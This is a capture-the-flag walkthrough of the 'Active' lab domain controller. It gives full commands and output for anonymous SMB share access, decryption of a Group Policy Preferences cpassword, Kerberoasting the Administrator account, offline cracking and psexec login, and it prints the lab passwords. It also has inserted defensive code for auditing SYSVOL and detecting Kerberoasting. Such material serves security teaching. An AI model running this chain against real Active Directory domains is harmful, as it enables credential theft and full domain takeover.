
Active

Enumeration

Nmap Scanning

Command

└─$ nmap -sC -sV 10.10.10.100 -oN nmap-scan

Result

# Nmap 7.93 scan initiated Mon Dec 19 18:37:32 2022 as: nmap -sC -sV -oN nmap-scan 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.32s latency).
Scanned at 2022-12-19 18:37:33 EAT for 736s
Not shown: 982 closed tcp ports (conn-refused)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-12-19 15:46:41Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  unknown
49165/tcp open  unknown
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
|_smb2-time: Protocol negotiation failed (SMB2)
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 62820/tcp): CLEAN (Timeout)
|   Check 2 (port 40109/tcp): CLEAN (Timeout)
|   Check 3 (port 41928/udp): CLEAN (Timeout)
|   Check 4 (port 38631/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Dec 19 18:49:49 2022 -- 1 IP address (1 host up) scanned in 737.12 seconds

The scan shows a number of open ports (DNS, Kerberos, RPC, LDAP and SMB, with the domain reported as active.htb and the host named DC), so this looks like a Windows Server 2008 R2 domain controller. We can check the services one by one; let's start with SMB.

Enumerate SMB

We can run smbmap to list the shares on the server and the permissions we have on each of them.

Command

┌──(gemstone㉿hashghost)-[~/…/htb/Machines/vip/active]
└─$ smbmap -H 10.10.10.100
[+] IP: 10.10.10.100:445        Name: active.htb                                        
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        Replication                                             READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share 
        Users                                                   NO ACCESS

After testing access to the shares without credentials, the only promising one was the Replication share, which is readable anonymously.

smbmap can also list a share recursively, so we can walk the whole Replication share to see whether it contains anything interesting.

Command

┌──(gemstone㉿hashghost)-[~/…/htb/Machines/vip/active]
└─$ smbmap -H 10.10.10.100 -R Replication

For this box the above command failed, so I decided to use smbclient and navigate the Replication share manually, which resulted in the following:

smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> dir
  .                                   D        0  Sat Jul 21 13:37:44 2018
  ..                                  D        0  Sat Jul 21 13:37:44 2018
  Groups.xml                          A      533  Wed Jul 18 23:46:06 2018

                5217023 blocks of size 4096. 244870 blocks available

I downloaded the Groups.xml file, which is a Group Policy Preferences file containing local account information; it was very common on Windows Server 2008. I downloaded the file to my Linux machine with the get command, and it contains the following:

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
	<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
		<Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
	</User>
</Groups>

The important details are the username, active.htb\SVC_TGS, and the cpassword value: edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
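The defender's counterpart to this finding, added here as an example (it is not part of the original write-up or of any tool it uses), is an audit of SYSVOL for exactly this exposure: walk the Policies tree and report every Group Policy Preferences file that still carries a non-empty cpassword attribute, without decrypting anything. The directory layout and the two XML samples are constructed for the demo (the placeholder cpassword is not a real value), and the file-name list is the set of preference files that can embed cpassword.

```python
"""Audit a SYSVOL-style tree for GPP files that still carry a cpassword.

Added defender example, not part of the write-up.  The sample tree and both
XML documents below are constructed for the demo.
"""
import os
import tempfile
import xml.etree.ElementTree as ET

# Group Policy Preferences files that can embed a cpassword attribute.
GPP_FILES = {"groups.xml", "services.xml", "scheduledtasks.xml",
             "datasources.xml", "printers.xml", "drives.xml"}

# Constructed sample 1: same shape as the Groups.xml from the write-up, but
# with a placeholder instead of a real encrypted password.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="EXAMPLE\\svc_demo" changed="2018-07-18 20:46:06">
    <Properties action="U" cpassword="PLACEHOLDER-BASE64-CPASSWORD" userName="EXAMPLE\\svc_demo"/>
  </User>
</Groups>
"""

# Constructed sample 2: a remediated file whose cpassword has been blanked.
SAMPLE_TASKS_XML = """<?xml version="1.0" encoding="utf-8"?>
<ScheduledTasks>
  <Task name="cleanup">
    <Properties action="C" runAs="EXAMPLE\\svc_task" cpassword=""/>
  </Task>
</ScheduledTasks>
"""


def audit_gpp_xml(xml_text, label):
    """Return one finding per element in xml_text with a non-empty cpassword."""
    findings = []
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        cpw = elem.attrib.get("cpassword", "")
        if not cpw:
            continue  # attribute absent, or blanked by remediation
        # The account name lives in a different attribute per preference type.
        account = (elem.attrib.get("userName") or elem.attrib.get("runAs")
                   or elem.attrib.get("accountName") or "<unknown>")
        findings.append({"file": label, "element": elem.tag,
                         "account": account, "cpassword_len": len(cpw)})
    return findings


def audit_gpp_tree(root_dir):
    """Walk root_dir and audit every file whose name is a GPP preference file."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for fname in files:
            if fname.lower() not in GPP_FILES:
                continue
            path = os.path.join(dirpath, fname)
            with open(path, encoding="utf-8") as fh:
                text = fh.read()
            try:
                findings.extend(audit_gpp_xml(text, os.path.relpath(path, root_dir)))
            except ET.ParseError:
                # A malformed preference file cannot be audited here; it still
                # deserves a manual look, so report it as such.
                findings.append({"file": os.path.relpath(path, root_dir),
                                 "element": "<unparseable>", "account": "<unknown>",
                                 "cpassword_len": -1})
    return findings


def build_sample_sysvol():
    """Create a throwaway tree mimicking Policies\\<GUID>\\MACHINE\\Preferences.

    Constructed for the demo; the GPO GUID is a placeholder."""
    root = tempfile.mkdtemp(prefix="sysvol-demo-")
    prefs = os.path.join(root, "Policies", "{00000000-0000-0000-0000-000000000001}",
                         "MACHINE", "Preferences")
    os.makedirs(os.path.join(prefs, "Groups"))
    os.makedirs(os.path.join(prefs, "ScheduledTasks"))
    with open(os.path.join(prefs, "Groups", "Groups.xml"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_GROUPS_XML)
    with open(os.path.join(prefs, "ScheduledTasks", "ScheduledTasks.xml"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_TASKS_XML)
    return root


if __name__ == "__main__":
    for f in audit_gpp_tree(build_sample_sysvol()):
        print(f"{f['file']}: <{f['element']}> account={f['account']} "
              f"cpassword={f['cpassword_len']} chars")
```

Run against a copy of a real SYSVOL (or a mount of the share), every non-empty finding is an account whose password any domain user can recover; the fix is to delete the preference item, rotate the affected password and, where the account is still needed, move it to a mechanism that never writes secrets to SYSVOL.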

Since we now have a username, we can try to recover its password.

Cracking the Password

A cpassword of this kind can be decrypted with the tool gpp-decrypt, because the AES key Microsoft used to protect Group Policy Preferences passwords is publicly documented.

┌──(gemstone㉿hashghost)-[~/…/htb/Machines/vip/active]
└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18

Hunting for other users in Active Directory

Command

┌──(gemstone㉿hashghost)-[~/…/htb/Machines/vip/active]
└─$ impacket-GetADUsers -all active.htb/svc_tgs -dc-ip 10.10.10.100

Result

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Querying 10.10.10.100 for information about domain.
Name                  Email                           PasswordLastSet      LastLogon           
--------------------  ------------------------------  -------------------  -------------------
Administrator                                         2018-07-18 22:06:40.351723  2022-12-20 09:43:59.406154 
Guest                                                 <never>              <never>             
krbtgt                                                2018-07-18 21:50:36.972031  <never>             
SVC_TGS                                               2018-07-18 23:14:38.402764  2018-07-21 17:01:30.320277 

I tried to log in using impacket-psexec, but it failed because the user svc_tgs is not an administrator; since we have credentials, we can use smbmap to check what this user can do.

┌──(gemstone㉿hashghost)-[~/…/htb/Machines/vip/active]
└─$ smbmap -H 10.10.10.100 -d active.htb -u svc_tgs -p GPPstillStandingStrong2k18
[+] IP: 10.10.10.100:445        Name: active.htb                                        
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        Replication                                             READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share 
        Users                                                   READ ONLY

User svc_tgs can read the Users share, so we can open it with smbclient and retrieve the user flag.

┌──(gemstone㉿hashghost)-[~/…/htb/Machines/vip/active]
└─$ smbclient //10.10.10.100/Users -U svc_tgs
Password for [WORKGROUP\svc_tgs]:

Download the user flag

smb: \svc_tgs\desktop\> get user.txt
getting file \svc_tgs\desktop\user.txt of size 34 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)

User flag

┌──(gemstone㉿hashghost)-[~/…/htb/Machines/vip/active]
└─$ cat user.txt 
d0d2d6a0c7******

Administrator Account

Kerberoasting

Let's run impacket-GetUserSPNs to see whether the active\Administrator account has a SPN configured; if it does, the -request flag asks the DC for a service ticket for it, and the ticket is encrypted with that account's password.

Command

┌──(gemstone㉿hashghost)-[~/…/htb/Machines/vip/active]
└─$ impacket-GetUserSPNs active.htb/svc_tgs -dc-ip 10.10.10.100 -request 

Result

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 22:06:40.351723  2022-12-20 09:43:59.406154

[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$0bd99a2a651a9a75117130fff4ae9e14$[remainder of hash omitted]
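From the detection side, the request above leaves a trace: every service ticket the DC issues is logged as Security event 4769, and a $krb5tgs$23$ hash is an RC4-HMAC ticket (TicketEncryptionType 0x17), which is what makes it crackable offline. The Python below is an added example, not part of the write-up or of Impacket: it runs a simple Kerberoasting heuristic over four constructed 4769 records (the client address 10.10.14.5, the second client and the jdoe account are invented; the account and SPN names come from this box) and flags requesters that obtain RC4 tickets for user-backed SPNs.

```python
"""Heuristic Kerberoasting detection over Windows Security event 4769 data.

Added defender example, not part of the write-up or of Impacket.  The
records are constructed; the field names follow the 4769 EventData schema.
"""

# Encryption types as they appear in TicketEncryptionType.
RC4_HMAC = "0x17"              # the etype behind $krb5tgs$23$ hashes
AES256_CTS_HMAC_SHA1 = "0x12"  # what a healthy modern domain should issue

# Constructed sample: an AES ticket for a computer account, an RC4 ticket for
# the user-backed SPN of this box, an RC4 request against krbtgt, and a
# failed request from another client.
SAMPLE_4769 = [
    {"TargetUserName": "svc_tgs@ACTIVE.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": AES256_CTS_HMAC_SHA1,
     "IpAddress": "::ffff:10.10.14.5", "Status": "0x0"},
    {"TargetUserName": "svc_tgs@ACTIVE.HTB", "ServiceName": "Administrator",
     "TicketEncryptionType": RC4_HMAC,
     "IpAddress": "::ffff:10.10.14.5", "Status": "0x0"},
    {"TargetUserName": "svc_tgs@ACTIVE.HTB", "ServiceName": "krbtgt",
     "TicketEncryptionType": RC4_HMAC,
     "IpAddress": "::ffff:10.10.14.5", "Status": "0x0"},
    {"TargetUserName": "jdoe@ACTIVE.HTB", "ServiceName": "Administrator",
     "TicketEncryptionType": RC4_HMAC,
     "IpAddress": "::ffff:10.10.10.50", "Status": "0x1b"},
]


def is_roast_candidate(ev):
    """True for a successful RC4 service-ticket request whose target is a
    user account: not a computer account (name ends in '$') and not krbtgt."""
    svc = ev["ServiceName"]
    return (ev["TicketEncryptionType"].lower() == RC4_HMAC
            and ev["Status"] == "0x0"
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")


def find_kerberoasting(events, threshold=1):
    """Group candidate tickets by (requesting user, client IP) and return the
    sources with at least `threshold` hits as {source: sorted SPN names}.

    On a real domain raise the threshold and add a time window: a burst of
    RC4 tickets for many distinct SPNs from one client is the classic signal."""
    by_source = {}
    for ev in events:
        if is_roast_candidate(ev):
            key = (ev["TargetUserName"], ev["IpAddress"])
            by_source.setdefault(key, []).append(ev["ServiceName"])
    return {src: sorted(set(spns)) for src, spns in by_source.items()
            if len(spns) >= threshold}


if __name__ == "__main__":
    for (user, ip), spns in find_kerberoasting(SAMPLE_4769).items():
        print(f"{user} from {ip} obtained RC4 service tickets for: {', '.join(spns)}")
```

The mitigation side matches the detection: restrict service accounts to AES (msDS-SupportedEncryptionTypes), give accounts that must hold a SPN long random passwords or use group Managed Service Accounts, and keep SPNs off privileged accounts such as Administrator, so that a ticket captured this way cannot be cracked and yields nothing if it is.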

Crack the hash

┌──(gemstone㉿hashghost)-[~/…/htb/Machines/vip/active]
└─$ john hash --wordlist=/usr/share/wordlists/rockyou.txt

Result

┌──(gemstone㉿hashghost)-[~/…/htb/Machines/vip/active]
└─$ john hash --show
?:Ticketmaster1968

1 password hash cracked, 0 left

Now log in to the machine as Administrator using impacket-psexec.

┌──(gemstone㉿hashghost)-[~/…/htb/Machines/vip/active]
└─$ impacket-psexec active.htb/administrator:Ticketmaster1968@10.10.10.100

Root flag

C:\Users\Administrator\Desktop> type root.txt
12a3d6a9eb**********

The end.

Mungu Nisaidie (God help me).
This post is licensed under CC BY 4.0 by the author.